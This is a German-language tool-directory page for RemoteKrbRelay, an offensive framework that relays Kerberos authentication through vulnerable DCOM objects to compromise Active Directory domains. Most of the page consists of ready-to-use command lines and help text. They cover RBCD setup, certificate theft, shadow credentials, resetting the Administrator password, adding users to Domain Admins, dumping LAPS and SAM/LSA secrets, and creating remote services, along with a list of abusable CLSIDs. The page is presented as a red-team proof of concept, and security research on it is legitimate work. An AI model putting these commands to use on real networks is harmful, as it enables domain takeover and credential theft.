Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
RemoteKrbRelay — Remote Kerberos Relay leicht gemacht! Fortschrittliches Kerberos-Relay-Framework | Kitploit
Tools/GitHubGitHub/cicada8-research/remotekrbrelay
Privilege EscalationSchwachstellenanalyseExploitationLaterale BewegungPenetrationstestsAuthentifizierungRed Teaming
GitHubcicada8-research/remotekrbrelay

RemoteKrbRelay

Remote Kerberos Relay leicht gemacht! Fortschrittliches Kerberos-Relay-Framework

Repository anzeigen
65095vor 1 JahrVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
root@kitploit:~
                            /\_/\____,
                  ,___/\_/\ \  ~     /
                  \     ~  \ )   XXX
                    XXX     /    /\_/\___,
                       \o-o/-o-o/   ~    /
                        ) /     \    XXX
                       _|    / \ \_/
                    ,-/   _  \_/   \
                   / (   /____,__|  )
                  (  |_ (    )  \) _|
                 _/ _)   \   \__/   (_
                (,-(,(,(,/      \,),),)

                CICADA8 Research Team
                From Michael Zhmaylo (MzHmO)

RemoteKrbRelay

Du kennst wahrscheinlich KrbRelay und KrbRelayUp, aber was wäre, wenn ich dir sage, dass es auch remote möglich ist? Mit RemoteKrbRelay wird das Realität.

TL;DR

Erfahre mehr über CertifiedDCOM hier. CertifiedDCOM erlaubt es dir, ein ADCS-Maschinenkonto auszulösen:

root@kitploit:~
# CertifiedDCOM (AD CS missbrauchen, indem RBCD gesetzt wird)
  .\RemoteKrbRelay.exe -rbcd -victim adcs.root.apchi -target dc01.root.apchi -clsid d99e6e74-fc88-11d0-b498-00a0c90312f3 -cn FAKEMACHINE$

# CertifiedDCOM (ADCS missbrauchen, um ein Maschinenzertifikat zu erhalten)
   .\RemoteKrbRelay.exe -adcs -template Machine -victim adcs.root.apchi -target dc01.root.apchi -clsid d99e6e74-fc88-11d0-b498-00a0c90312f3

# CertifiedDCOM (ADCS mit ShadowCreds missbrauchen)
  .\RemoteKrbRelay.exe -shadowcred -victim adcs.root.apchi -target dc01.root.apchi -clsid d99e6e74-fc88-11d0-b498-00a0c90312f3 -forceshadowcred

Es gibt auch den SilverPotato-Exploit. Du kannst ihn verwenden, um Sitzungen zu missbrauchen. Einschließlich einer Domain-Admin-Sitzung auf einem Drittsystem.

root@kitploit:~
# Benutzerpasswort ändern
  .\RemoteKrbRelay.exe -chp -victim dc01.root.apchi -target dc01.root.apchi -clsid f87b28f1-da9a-4f35-8ec0-800efcf26b83 -chpuser Administrator -chppass Lolkekcheb123! -secure

# Benutzer zu Gruppe hinzufügen
  .\RemoteKrbRelay.exe -addgroupmember -victim computer.root.apchi -target dc01.root.apchi -clsid f87b28f1-da9a-4f35-8ec0-800efcf26b83 -group "Domain Admins" -groupuser petka

# LAPS-Passwörter auslesen
  .\RemoteKrbRelay.exe -laps -victim mssql.root.apchi -target dc01.root.apchi -clsid f87b28f1-da9a-4f35-8ec0-800efcf26b83

# LDAP-Whoami-Anfrage vom weitergeleiteten Benutzer senden
  .\RemoteKrbRelay.exe -ldapwhoami -victim win10.root.apchi -target dc01.root.apchi -clsid f87b28f1-da9a-4f35-8ec0-800efcf26b83

# Authentifizierung aus einer anderen Sitzung auslösen
  .\RemoteKrbRelay.exe -ldapwhoami -victim domainadminhost.root.apchi -target dc01.root.apchi -clsid f87b28f1-da9a-4f35-8ec0-800efcf26b83 -session 1

Details

Jetzt hast du vier Ordner vor dir:

  • Checker – alte Version des Checkers zur Erkennung verwundbarer DCOM-Objekte;
  • Checkerv2.0 – neue Version des Checkers zur Erkennung verwundbarer DCOM-Objekte;
  • Exploit – RemoteKrbRelay.exe :)
  • FindAvailablePort – ein Tool zur Firewall-Umgehung bei der Nutzung des Exploits.

Checker

Beginnen wir also mit dem Checker. Du kannst ihn verwenden, um verwundbare DCOM-Objekte zu erkennen. Ein verwundbares DCOM-Objekt liegt vor, wenn:

  • Der COM-Server, in dem das DCOM-Objekt läuft, als anderer Benutzer oder als System ausgeführt werden muss. Aber niemals als NT AUTHORITY\LOCAL SERVICE, da dieser leere Anmeldeinformationen verwendet, um sich aus dem Netzwerk zu authentifizieren;
  • Du über RemoteLaunch- und RemoteActivation-Berechtigungen verfügen musst. Das ist LaunchPermissions;
  • Die Impersonation-Ebene RPC_C_IMP_LEVEL_IDENTIFY oder höher sein sollte. RPC_C_IMP_LEVEL_IDENTIFY ist der Standardwert;
  • Du über RemoteAccess-Berechtigungen verfügen solltest (oder diese leer sein sollten). Das ist AccessPermission.

Zur einfachen Erkennung kannst du Checkerv2.0 verwenden. Es unterstützt die Ausgabe in den Formaten CSV und XLSX.

root@kitploit:~
PS A:\ssd\Share\RemoteKrbRelay\Checkerv2.0\Checkerv2.0\bin\Debug> .\Checkerv2.0.exe -h

                            /\_/\____,          /\     /\
                  ,___/\_/\ \  ~     /            \ _____\
                  \     ~  \ )   XXX               (_)-(_)
                    XXX     /    /\_/\___,      Checkerv2.0 Collection
                       \o-o/-o-o/   ~    /
                        ) /     \    XXX
                       _|    / \ \_/
                    ,-/   _  \_/   \
                   / (   /____,__|  )
                  (  |_ (    )  \) _|
                 _/ _)   \   \__/   (_
                (,-(,(,(,/      \,),),)

                CICADA8 Research Team
                From Michael Zhmaylo (MzHmO)

Check.exe
Small tool that allow you to find vulnerable DCOM applications

[OPTIONS]
-outfile : output filename
-outformat : output format. Accepted 'csv' and 'xlsx'
-showtable : show the xlsx table when it gets filled
-h/--help : shows this windows

Beispiel:

root@kitploit:~
.\Checkerv2.0.exe -outfile win10 -outformat xlsx

Und du erhältst eine solche Ausgabe: изображение

Die Spalten enthalten die CLSIDs der DCOM-Objekte, deren Namen sowie LaunchPermission und AccessPermission. изображение

Versuche, nach den Objekten sppui (CLSID {F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}, APPID {0868DC9B-D9A2-4f64-9362-133CEA201299}) und CertSrv Request (CLSID {d99e6e74-fc88-11d0-b498-00a0c90312f3}) zu suchen und verstehe, warum sie verwundbar sind.

Bitte nutze nicht den Checker, sondern nur Checkerv2.0 :3

FindAvailablePort

Ein kleines Tool zum Finden eines Ports, auf dem ein bösartiger DCOM-Server errichtet werden soll. Details siehe hier (Remote -> Local Potato).

изображение

Übe mit dem Konzept eines lokalen Ports. Schreibe RemotePotato0 auf einen lokalen Port um. Vertrau mir, das ist nützlich.

Exploit

Ich habe dem Exploit eine ganze Reihe verschiedener Funktionen hinzugefügt. Beachte, dass er genügend Funktionalität bietet, um DCOM-Objekte zu missbrauchen. Ich habe auch ein paar CLSIDs in der Hilfe für den Missbrauch aufgelistet. Diese CLSIDs waren öffentlich bekannt, es gab nur keinen POC, um sie zu missbrauchen. Es gibt einige verwundbare DCOM-Objekte – arbeite mit dem Checker und finde sie alle!

root@kitploit:~
PS A:\ssd\Share\RemoteKrbRelay\Exploit\RemoteKrbRelay\bin\x64\Debug> .\RemoteKrbRelay.exe -h

                            /\_/\____,
                  ,___/\_/\ \  ~     /
                  \     ~  \ )   XXX
                    XXX     /    /\_/\___,
                       \o-o/-o-o/   ~    /
                        ) /     \    XXX
                       _|    / \ \_/
                    ,-/   _  \_/   \
                   / (   /____,__|  )
                  (  |_ (    )  \) _|
                 _/ _)   \   \__/   (_
                (,-(,(,(,/      \,),),)

                CICADA8 Research Team
                From Michael Zhmaylo (MzHmO)

[HELP PANEL]
        RemoteKrbRelay.exe
        Relaying Remote Kerberos Auth by easy way
        Usage: RemoteKrbRelay.exe [ATTACKS] [REQUIRED OPTIONS] [OPTIONAL PARAMS] [ATTACK OPTIONS] [SWITCHES]

[ATTACKS] (one required!)
        -rbcd : relay to LDAP and setup RBCD
        -adcs : relay to HTTP Web Enrollment and get certificate
        -smb : relay to SMB
        -shadowcred : relay to LDAP and setup Shadow Credentials
        -chp : relay to LDAP and change user password
        -addgroupmember : relay to LDAP and add user to group
        -laps : relay to LDAP and extract LAPS passwords
        -ldapwhoami : relay to LDAP and get info about relayed user

[REQUIRED OPTIONS]
        -target : relay to this target
        -victim : relay this computer
        -clsid : target CLSID to abuse

[OPTIONAL PARAMS]
        -spn : with ticket on this SPN victim will come to us. For ex: ldap/dc01.root.apchi - tkt for RBCD mode , http/dc01.root.apchi - tkt for ADCS mode
        -d/--domain : current (target) domain
        -dc/--domaincontoller : target DC
        -local : current computer hostname. This host will be in OBJREF.

[ATTACK OPTIONS]
        [SMB OPTIONS (Relay to SMB)]
        --smbkeyword : specify 'secrets' or 'service-add' or 'interactive'
        --servicename : service-add cmdlet. Name of new service
        --servicecmd : service-add cmdlet. Commandline of the service

        [ADCS OPTIONS (Relay to HTTP)]
        -template : ADCS Mode only. Template to relay to

        [RBCD OPTIONS (Relay to LDAP)]
        -c/--create :  Create new computer
        -cn/--computername :  Computer name that will be written to msDs-AllowedToActOnBehalfOfOtherIdentity
        -cp/--computerpassword : requires -c switch. Password for new computer
        --victimdn : DN of victim computer

        [CHANGE PASSWORD OPTIONS (Relay to LDAP)]
        -chpuser : the name of the user whose password you want to change
        -chppass : new password

        [ADD GROUP MEMBER OPTIONS (Relay to LDAP)]
        -group : group name
        -groupuser : user to add to the group
        -groupdn : target group DN
        -userdn : target user DN

        [SHADOWCRED OPTIONS (Relay to LDAP)]
        -forceshadowcred : force shadow creds

        [LAPS OPTIONS (Relay to LDAP)]
        -lapsdevice : Optional param. Target computer hostname to dump laps from

[SWITCHES]
        -h/--help : show help
        -debug : show debug info
        -secure : use SSL for connection to LDAP/HTTP/etc
        -p/--port : port to deploy rogue dcom server
        -session : cross-session activation. Useful when instantiating com objects with RunAs value as "The Interactive User"
        -module : default "System". It is for firewall bypass

[EXAMPLES]
        [1] Trigger kerberos authentication from adcs.root.apchi (-victim). Then relay to dc01.root.apchi (-target). And setup RBCD (u can optionally provide -dc because setuping RBCD requires connection to ldap on DC) from adcs.root.apchi to FAKEMACHINE$ (-cn). As a result u can pwn adcs.root.apchi from FAKEMACHINE$ through RBCD
        .\RemoteKrbRelay.exe -rbcd -victim adcs.root.apchi -target dc01.root.apchi -clsid d99e6e74-fc88-11d0-b498-00a0c90312f3 -cn FAKEMACHINE$

        [2] Trigger krb auth from dc01.root.apchi (-victim). Then relay to win10.root.apchi (-target) and open interactive SMB Console.
        .\RemoteKrbRelay.exe -smb --smbkeyword interactive -victim dc01.root.apchi -target win10.root.apchi -clsid <IDK CLSID FOR THAT xD>

        [3] Trigger krb auth from dc01.root.apchi (-victim). Then relay to win10.root.apchi (-target) and dump SAM/LSA secrets from win10.root.apchi.
        .\RemoteKrbRelay.exe -smb --smbkeyword secrets -victim dc01.root.apchi -target win10.root.apchi -clsid <IDK CLSID FOR THAT xD>

        [4] Trigger krb auth from dc01.root.apchi (-victim). Then relay to win10.root.apchi (-target) and create service.
        .\RemoteKrbRelay.exe -smb --smbkeyword service-add --servicename Hello --servicecmd "c:\windows\system32\calc.exe" -victim dc01.root.apchi -target win10.root.apchi -clsid <IDK CLSID FOR THAT xD>

        [5] Get machine certificate from kerberos relay
        .\RemoteKrbRelay.exe -adcs -template Machine -target dc01.root.apchi -victim win10.root.apchi -clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8

        [6] Shadow Creds
        .\RemoteKrbRelay.exe -shadowcred -victim dc01.root.apchi -target dc01.root.apchi -clsid d99e6e74-fc88-11d0-b498-00a0c90312f3 -forceshadowcred

        [7] Change user password
        .\RemoteKrbRelay.exe -chp -victim dc01.root.apchi -target dc01.root.apchi -clsid f87b28f1-da9a-4f35-8ec0-800efcf26b83 -chpuser Administrator -chppass Lolkekcheb123! -secure

        [9] Dump LAPS passwords
        .\RemoteKrbRelay.exe -laps -victim dc01.root.apchi -target dc01.root.apchi -clsid f87b28f1-da9a-4f35-8ec0-800efcf26b83

        [10] Send LDAP Whoami request from relayed user
        .\RemoteKrbRelay.exe -ldapwhoami -victim dc01.root.apchi -target dc01.root.apchi -clsid f87b28f1-da9a-4f35-8ec0-800efcf26b83

        [11] Trigger authentication from another session
        .\RemoteKrbRelay.exe -ldapwhoami -victim dc01.root.apchi -target dc01.root.apchi -clsid f87b28f1-da9a-4f35-8ec0-800efcf26b83 -session 1

[?] Interesting CLSIDs to use
dea794e0-1c1d-4363-b171-98d0b1703586 - Interactive User. U can use with -session switch. U should be in NT AUTHORITY\Interactive
f87b28f1-da9a-4f35-8ec0-800efcf26b83 - Interactive User. U can use with -session switch. U should be in Distributed COM Users or Performance Log Users
3ab092c4-de6a-4cd4-be9e-fdacdb05759c - System account. On victim computer should be installed AD CS
6d5ad135-1730-4f19-a4eb-3f87e7c976bb - System account. On victim computer should be installed AD CS

Beispiele

Ich schlage vor, einige der Angriffe anzusehen:

  • RBCD – an LDAP weiterleiten und RBCD einrichten. Pasted image 20240520155730

  • HTTP ADCS – an den Web Enrollment Service weiterleiten. Pasted image 20240520155547

  • ShadowCred – an LDAP weiterleiten und ShadowCreds einrichten. Pasted image 20240529141710

  • Benutzer zu Gruppe hinzufügen Pasted image 20240529170057

  • LDAP-Whoami-Anfrage – Es ist praktisch, dies mit der CLSID-Bruteforce-Funktion zu kombinieren. Du kannst herausfinden, welcher Benutzer ausgelöst wird. Versuche, die ersten fünf Sitzungen auf allen Maschinen in der Domäne auszulösen. Wow, war das ein Domain-Admin in fünf Minuten? :) Pasted image 20240530214447

Unterstützt die sitzungsübergreifende Aktivierung mit -session: Pasted image 20240530220634

Pasted image 20240530220705

Außerdem LAPS, Benutzerpasswort ändern, SMB....

Video-DEMO:

  • https://youtu.be/1zvycrTTgDU

TO-DO-Liste

  • GMSA auslesen
  • Exchange-zu-Exchange-Relay
  • CLSID-Bruteforce
  • Relay mit zusätzlichen Anmeldeinformationen

Tipps

  • Relay der Authentifizierung der initialen OXID-Request. Link. Du kannst testen:
root@kitploit:~
.\RemoteKrbRelay.exe -ldapwhoami -victim win10.vostok.street -target dc01.vostok.street -clsid f87b28f1-da9a-4f35-8ec0-800efcf26b83 -local dc011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAAA

# but I haven't implemented the relay from Initial OXID Request yet. Do it BRO! :)
# dc011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAAA <- this is DNS A record that points to kali (thx to CredMarshalTargetInfo() because i can receive tkt on RPCSS/dc01)
  • Du kannst ein TGT im AP-REQ erhalten. Was, wenn DES-Kryptografie verwendet wird?
root@kitploit:~
.\RemoteKrbRelay.exe -rbcd -victim win10.vostok.street -target dc01.vostok.street -clsid d99e6e74-fc88-11d0-b498-00a0c90312f3 -spn krbtgt/root.apchi -cn FAKEMACHINE$

Fazit

Die Verwundbarkeit ist ziemlich ernst. Beachte, dass dies der minimale POC ist. Du solltest ihn verfeinern, wenn du ihn stabil in deinen Red-Team-Projekten einsetzen möchtest.

Danksagungen

  • Die Repos KrbRelay und KrbRelayUp, mit deren Hilfe ich Kerberos Relay verstehen konnte
  • BH Asia 2024 Talk
  • Silver Potato

Danke, dass ihr den POC zu CertifiedDCOM und SilverPotato nicht veröffentlicht habt, ich war total darauf erpicht, sie auf Basis dieser Artikel umzusetzen :D

Tool herunterladen